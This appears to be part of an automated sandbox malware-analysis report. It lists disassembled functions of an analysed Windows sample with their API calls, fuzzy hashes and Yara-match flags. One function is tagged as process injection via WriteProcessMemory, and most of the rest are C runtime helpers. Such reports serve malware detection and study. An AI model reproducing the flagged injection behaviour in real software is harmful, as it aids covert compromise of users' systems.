                                                                        • Instruction ID: 0fed921bd2ac38893e3fe96d867c73d3c62318e9c4a301da478f94341b3b3cb2
                                                                        • Opcode Fuzzy Hash: 8bfea186d0018943c42780c94403ae4a5a1316809e3b7ea8738cc75c244297ce
                                                                        • Instruction Fuzzy Hash: FD4178306042449FD750FBB8CD82B9A37E9AF85700F5480B1BD0CDB796EE31AD458B65
                                                                        Function 00BEB7B0 Relevance: 1.5, APIs: 1, Instructions: 44injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 484 beb7b0-beb7d9 485 beb7db 484->485 486 beb805-beb80b 484->486 487 beb7dd-beb7e0 485->487 488 beb7e2-beb804 WriteProcessMemory 485->488 487->486 487->488
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00BEB7F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BEB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BEB000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_beb000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction ID: 458d5fa0715db57a05b05100e8dd3828df2f60ebeb32adf3667a545f5fda9bae
                                                                        • Opcode Fuzzy Hash: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction Fuzzy Hash: 45F0247174024E26EF189CBD9C41FAEBBDACBC2630F1583AAB919C62D4EA7088044291
                                                                        Function 00BACFFC Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 489 bacffc-bad019 491 bad01e-bad021 489->491 492 bad023-bad026 491->492 493 bad030 491->493 492->493 494 bad028-bad02e 492->494 495 bad032-bad04d LoadCursorW call bad17c 493->495 494->495 495->491 498 bad04f-bad053 495->498
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00000000,?,?,?,00B9F730,00BACB5F,?,?,00000000,?,00B193F0), ref: 00BAD036
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CursorLoad
                                                                        • String ID:
                                                                        • API String ID: 3238433803-0
                                                                        • Opcode ID: ec80d4291437f1cdc313cca2f933061946e46ac6139ee6a1d4bb4feb06091a5f
                                                                        • Instruction ID: ec0eb07764ccd192abd4c7c5fa3c8d6469be309d1ee0b73fd9376d68d7e958b7
                                                                        • Opcode Fuzzy Hash: ec80d4291437f1cdc313cca2f933061946e46ac6139ee6a1d4bb4feb06091a5f
                                                                        • Instruction Fuzzy Hash: 64F0A0226092002BE6305A3D4CE0F6AB2C8DBC7330F2003B6F93E976D1DA211C0616A0
                                                                        Function 00B094B0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 499 b094b0-b094f7 KiUserCallbackDispatcher
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00B094EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                        • Instruction ID: e0bbe715bca3811110881742a92ef003db1fcb23f4917bcbe1fd8e336695c67c
                                                                        • Opcode Fuzzy Hash: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                        • Instruction Fuzzy Hash: D4F0DA762047119FC310DF5CC88494BB7E9EF89259F044A59F986DB351C771E814CB92
                                                                        Function 010E2BBE Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4456603303.00000000010E2000.00000020.00000001.01000000.00000007.sdmp, Offset: 010E2000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_10e2000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =
                                                                        • API String ID: 0-2322244508
                                                                        • Opcode ID: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction ID: ceb655d00bf0874a40dc8ef9e0a515f070c860bf3a730ae11ede1ea62069664f
                                                                        • Opcode Fuzzy Hash: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction Fuzzy Hash: 19F05C2096C146EFC720CA3884C0B777BE1CF95310F2197ACB5DE8B641D2794C0AE600

                                                                        Non-executed Functions

                                                                        Function 00BFF18A Relevance: 16.8, APIs: 11, Instructions: 347COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?), ref: 00BFF25A
                                                                        • _malloc.LIBCMT ref: 00BFF293
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,00BF9E02,?,?), ref: 00BFF2C6
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00BF9E02,?,?), ref: 00BFF2E2
                                                                        • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00BFF31C
                                                                        • _malloc.LIBCMT ref: 00BFF355
                                                                        • __freea.LIBCMT ref: 00BFF3AD
                                                                        • __freea.LIBCMT ref: 00BFF3B6
                                                                        • _malloc.LIBCMT ref: 00BFF46B
                                                                        • _memset.LIBCMT ref: 00BFF48D
                                                                        • __freea.LIBCMT ref: 00BFF4D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_malloc$_memset
                                                                        • String ID:
                                                                        • API String ID: 3920393152-0
                                                                        • Opcode ID: 91b3978627b20820c3e5adc3148b1e93734f17d59ee2eb7e4b7e5340f5688459
                                                                        • Instruction ID: ba48e122e899d6f583cff1a0fbd3a12f70555ff8eb59a30073821a8a9ab95adf
                                                                        • Opcode Fuzzy Hash: 91b3978627b20820c3e5adc3148b1e93734f17d59ee2eb7e4b7e5340f5688459
                                                                        • Instruction Fuzzy Hash: 17B16B7280011EAFCF219FA4CC818BE7BE5EF48354B1545B9FA05A7260D7318E99DB64
                                                                        Function 00BFB99D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 114COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,?,?,?,00BFA861), ref: 00BFBA60
                                                                        • __init_pointers.LIBCMT ref: 00BFBA6A
                                                                        • __mtterm.LIBCMT ref: 00BFBB20
                                                                          • Part of subcall function 00BFB649: TlsFree.KERNEL32(00C0C65C,00BFA8F6), ref: 00BFB674
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FreeValue__init_pointers__mtterm
                                                                        • String ID: FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                        • API String ID: 3928193026-1030280904
                                                                        • Opcode ID: d230966ecdc2d47109a37de771c1bbb137af24c49b53880f4ad6d07d041e6927
                                                                        • Instruction ID: b5e24b7fe362b3f8965cf7ad2d1210c03277acf48629d45f25f6181abefaeeef
                                                                        • Opcode Fuzzy Hash: d230966ecdc2d47109a37de771c1bbb137af24c49b53880f4ad6d07d041e6927
                                                                        • Instruction Fuzzy Hash: 974180318003199AD721AFB5ED55F2F3BD4EB04320B1245BEEA14D39B2DB75848BCB60
                                                                        Function 00C022D3 Relevance: 9.2, APIs: 6, Instructions: 178COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 00C02355
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00BFF75E), ref: 00C02395
                                                                        • _malloc.LIBCMT ref: 00C023A5
                                                                        • _memset.LIBCMT ref: 00C023CD
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00BFF75E,?), ref: 00C023E4
                                                                        • __freea.LIBCMT ref: 00C0246C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_malloc_memset_strlen
                                                                        • String ID:
                                                                        • API String ID: 3923921168-0
                                                                        • Opcode ID: b605a741fde1945a6e110d3932523fb5af8e3c8c14ee8ade3ed42b9107992a86
                                                                        • Instruction ID: 923228956e492c72773e8fb39158ee06d2ee09dd9c10099dbcccde06a69c0f3c
                                                                        • Opcode Fuzzy Hash: b605a741fde1945a6e110d3932523fb5af8e3c8c14ee8ade3ed42b9107992a86
                                                                        • Instruction Fuzzy Hash: 4E516D31900219EFCF219FA5DC48DEFBBB9EF89760F204129F524B61A0D7358A41DBA0
                                                                        Function 00BFABAA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: String___crt$Type_memset
                                                                        • String ID:
                                                                        • API String ID: 1957702402-3916222277
                                                                        • Opcode ID: fe33630ccf7c12356ace0ecb3f91cb4a4d1c103c1c1c903ba6be12a4a4041bd7
                                                                        • Instruction ID: 60a331ec22b517b6eaa795436eaaffaa973e651266812a27284c0f7e9f26153e
                                                                        • Opcode Fuzzy Hash: fe33630ccf7c12356ace0ecb3f91cb4a4d1c103c1c1c903ba6be12a4a4041bd7
                                                                        • Instruction Fuzzy Hash: 194113B510079C6FDB258B249C94FFBBBECEF05704F2444E8E68A87182D2719A499F61
                                                                        Function 00C04AC0 Relevance: 7.8, APIs: 5, Instructions: 263COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _ValidateScopeTableHandlers.LIBCMT ref: 00C04BC1
                                                                        • __FindPESection.LIBCMT ref: 00C04BDB
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FindHandlersScopeSectionTableValidate
                                                                        • String ID:
                                                                        • API String ID: 876702719-0
                                                                        • Opcode ID: d0b45e20526ae4853de5b35b1765733cdf408476fd2bce95ca599e635fae6fdf
                                                                        • Instruction ID: 40cbd70fffaaacb92a047f8dec5cf9516b77c969e5c2e6b61980e2c7d12ff4ac
                                                                        • Opcode Fuzzy Hash: d0b45e20526ae4853de5b35b1765733cdf408476fd2bce95ca599e635fae6fdf
                                                                        • Instruction Fuzzy Hash: E091E5B2A006188BDB28CF59D88076FB7B5FB84351F16412CDA25977E1E731ED42CB90
                                                                        Function 00BFF574 Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00BFF75E,?,?,?), ref: 00BFF61A
                                                                        • _malloc.LIBCMT ref: 00BFF64F
                                                                          • Part of subcall function 00C022D3: _strlen.LIBCMT ref: 00C02355
                                                                          • Part of subcall function 00C022D3: _memset.LIBCMT ref: 00C023CD
                                                                          • Part of subcall function 00C022D3: MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00BFF75E,?), ref: 00C023E4
                                                                        • _memset.LIBCMT ref: 00BFF66F
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00BFF684
                                                                        • __freea.LIBCMT ref: 00BFF69C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$_memset$__freea_malloc_strlen
                                                                        • String ID:
                                                                        • API String ID: 574822426-0
                                                                        • Opcode ID: e24f85320cfe0532b2630072a3f03b592c182d4e72254d9a1ae54922a3161ee5
                                                                        • Instruction ID: 389888b77e2e60ada80113e1f82c2895dbb49de9c9b4949c180208555d65117c
                                                                        • Opcode Fuzzy Hash: e24f85320cfe0532b2630072a3f03b592c182d4e72254d9a1ae54922a3161ee5
                                                                        • Instruction Fuzzy Hash: 6251687250010FBFCB20AFA49C819BE7BE9EF18354B1405BAFA14C7160DA31CD68DBA0
                                                                        Function 00C04009 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __CreateFrameInfo.LIBCMT ref: 00C04031
                                                                          • Part of subcall function 00C03921: __getptd.LIBCMT ref: 00C0392F
                                                                          • Part of subcall function 00C03921: __getptd.LIBCMT ref: 00C0393D
                                                                        • __getptd.LIBCMT ref: 00C0403B
                                                                          • Part of subcall function 00BFB7E6: __amsg_exit.LIBCMT ref: 00BFB7F6
                                                                        • __getptd.LIBCMT ref: 00C04049
                                                                        • __getptd.LIBCMT ref: 00C04057
                                                                        • __getptd.LIBCMT ref: 00C04062
                                                                          • Part of subcall function 00C039C6: __CallSettingFrame@12.LIBCMT ref: 00C03A12
                                                                          • Part of subcall function 00C0412F: __getptd.LIBCMT ref: 00C0413E
                                                                          • Part of subcall function 00C0412F: __getptd.LIBCMT ref: 00C0414C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit
                                                                        • String ID:
                                                                        • API String ID: 3174811152-0
                                                                        • Opcode ID: 207eb629d19133c1b58a5250d1da6745d41d4e5ad16821eb7d210aa5e97d8cc6
                                                                        • Instruction ID: c825005b41c106604121e7cee1b8e5517399703964e7ade00920bd4aa3271c68
                                                                        • Opcode Fuzzy Hash: 207eb629d19133c1b58a5250d1da6745d41d4e5ad16821eb7d210aa5e97d8cc6
                                                                        • Instruction Fuzzy Hash: 181107B5C04209DFDB00EFA4C985AAE7BF0FF04310F1080A9F914A7291DB789A55DF51
                                                                        Function 008F8494 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84C3
                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,008F8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_8f1000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationLogicalProcessor
                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                        • API String ID: 1773637529-812649623
                                                                        • Opcode ID: 50924ce77512a2b9dafe910b696f906bb0c761ed524ada5e9755cf228c8b0ce0
                                                                        • Instruction ID: facfc26de495bd95f743f6b9e6ff843d37e0a52cc7384122512081d852e66927
                                                                        • Opcode Fuzzy Hash: 50924ce77512a2b9dafe910b696f906bb0c761ed524ada5e9755cf228c8b0ce0
                                                                        • Instruction Fuzzy Hash: E011907190420CEFEB10EBB8DC52B7EB7E8FB48314F254066E714D6181EE359A948626
                                                                        Function 008F8492 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84C3
                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,008F8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_8f1000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationLogicalProcessor
                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                        • API String ID: 1773637529-812649623
                                                                        • Opcode ID: eb521f12a6e7dd0da2c0eda1631aa079634bb3e38c97a74df442a745008d3fe7
                                                                        • Instruction ID: 87294933dab529522d583cb354c25481a4c3e069fd1f8a97d09fff900418ef72
                                                                        • Opcode Fuzzy Hash: eb521f12a6e7dd0da2c0eda1631aa079634bb3e38c97a74df442a745008d3fe7
                                                                        • Instruction Fuzzy Hash: C1018070D0460CEFEB10EBB89C42A7EB7E8FB08314F114166F714D6181EE75DA948626
                                                                        Function 008FC860 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetThreadUILanguage.KERNEL32(?,00000000), ref: 008FC871
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 008FC8CF
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 008FC92C
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 008FC95F
                                                                          • Part of subcall function 008FC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,008FC8DD), ref: 008FC833
                                                                          • Part of subcall function 008FC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,008FC8DD), ref: 008FC850
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_8f1000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Thread$LanguagesPreferred$Language
                                                                        • String ID:
                                                                        • API String ID: 2255706666-0
                                                                        • Opcode ID: cb636dda3aa5bb8e51ffb7a5071b6d3f1a8ab48cd583134b6a2cb5bda97c5242
                                                                        • Instruction ID: d0f52351635fb46696d556c3066608cab0e73296f065fedb270bd0911e359935
                                                                        • Opcode Fuzzy Hash: cb636dda3aa5bb8e51ffb7a5071b6d3f1a8ab48cd583134b6a2cb5bda97c5242
                                                                        • Instruction Fuzzy Hash: 0D314B70E1021E9BDB10EFF8C995ABEB7B4FF08310F104166E665E7291EB749A04CB91
                                                                        Function 00BFF5CA Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00BFF75E,?,?,?), ref: 00BFF61A
                                                                        • _memset.LIBCMT ref: 00BFF66F
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00BFF684
                                                                        • __freea.LIBCMT ref: 00BFF69C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_memset
                                                                        • String ID:
                                                                        • API String ID: 2568176243-0
                                                                        • Opcode ID: e9049fcbddb7fb4b8e484a19e5a78984acba0c86dce17e3028d0f48bc9d641b7
                                                                        • Instruction ID: f8c95830d0ceb7a2542ef7a7ac9e8caa8ad37ff1630420afda00e058be8fd9ce
                                                                        • Opcode Fuzzy Hash: e9049fcbddb7fb4b8e484a19e5a78984acba0c86dce17e3028d0f48bc9d641b7
                                                                        • Instruction Fuzzy Hash: 5321057160010FABDB10AF98DC81ABE7BE9EF14354B2504B5FA05D7161DB31DD68DA90
                                                                        Function 00BFB59A Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,00BFB635), ref: 00BFB5AC
                                                                        • TlsGetValue.KERNEL32(00C0C658,?,00BFB635), ref: 00BFB5C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID: DecodePointer$KERNEL32.DLL
                                                                        • API String ID: 3702945584-629428536
                                                                        • Opcode ID: 8a553d0ca39e8b1f80bf7a0aef9837f609eaf06a487c756e32f3408786d05b3c
                                                                        • Instruction ID: 803400d41d3827233b90b90d94714258c48f6cad89090b5782f9b3b42a526f35
                                                                        • Opcode Fuzzy Hash: 8a553d0ca39e8b1f80bf7a0aef9837f609eaf06a487c756e32f3408786d05b3c
                                                                        • Instruction Fuzzy Hash: ADF0877050421EAACE206B2AEC90FBB7BD8DF043A071502A0BE08D71A0DB25CD19C6E0
                                                                        Function 00BFB51F Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,00BFB598,00000000,00C0273C,00C0F6D0,00000000,00000314,?,00C00261,00C0F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00BFB531
                                                                        • TlsGetValue.KERNEL32(00C0C658,?,00BFB598,00000000,00C0273C,00C0F6D0,00000000,00000314,?,00C00261,00C0F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00BFB548
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID: EncodePointer$KERNEL32.DLL
                                                                        • API String ID: 3702945584-3682587211
                                                                        • Opcode ID: 1e904375856621288cd997a064a0567ac1a1637160339e9d616e9f9ed6e07982
                                                                        • Instruction ID: 35c6bbe98238ddc167d55657bd3ae9b9205050d684e5357abc74ca52d3d91bdd
                                                                        • Opcode Fuzzy Hash: 1e904375856621288cd997a064a0567ac1a1637160339e9d616e9f9ed6e07982
                                                                        • Instruction Fuzzy Hash: 8CF04F3060011EAACB116B29EC54EBE3BECDF553A4B1502B1FE18D71A1DB25DE15C6A0
                                                                        Function 00C03D9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallFrame@12Setting__getptd
                                                                        • String ID: j
                                                                        • API String ID: 3454690891-2137352139
                                                                        • Opcode ID: c4a67d9dd7f0164245bec01a564f135e69c4739bb5b40795172e5f2408bc0f66
                                                                        • Instruction ID: 7037b4632913d1c1e2a39489908174ac7c13724f396e2b50b2188d1f8de34ec3
                                                                        • Opcode Fuzzy Hash: c4a67d9dd7f0164245bec01a564f135e69c4739bb5b40795172e5f2408bc0f66
                                                                        • Instruction Fuzzy Hash: 6B118B71915295EFCB12DF69C8443ACBFB4BF05718F28868AD4A46F1C3C371AA51DB81
                                                                        Function 00C043B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___BuildCatchObject.LIBCMT ref: 00C043C9
                                                                          • Part of subcall function 00C04324: ___BuildCatchObjectHelper.LIBCMT ref: 00C0435A
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00C043E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                        • String ID: csm
                                                                        • API String ID: 3487967840-1018135373
                                                                        • Opcode ID: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                        • Instruction ID: 329674052ad0318cca3962b8e062ed892b52cef03767d5e60c89718dd9c29754
                                                                        • Opcode Fuzzy Hash: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                        • Instruction Fuzzy Hash: 26012FB5000109BBCF16AF51DC46EAB3EAAFF08341F008010BE18241A1D772AAB1EBA0
                                                                        Function 00C0412F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00C0413E
                                                                          • Part of subcall function 00BFB7E6: __amsg_exit.LIBCMT ref: 00BFB7F6
                                                                        • __getptd.LIBCMT ref: 00C0414C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$__amsg_exit
                                                                        • String ID: csm
                                                                        • API String ID: 1969926928-1018135373
                                                                        • Opcode ID: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                        • Instruction ID: 2b77350bb6112a19d2276a34448421d23509cc5e303c171c1bf95f4dde67a6cc
                                                                        • Opcode Fuzzy Hash: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                        • Instruction Fuzzy Hash: 73016DB68002049FDF389F64D444AAEB7B9AF24311F14446DE160562D2CB70DFE4DF41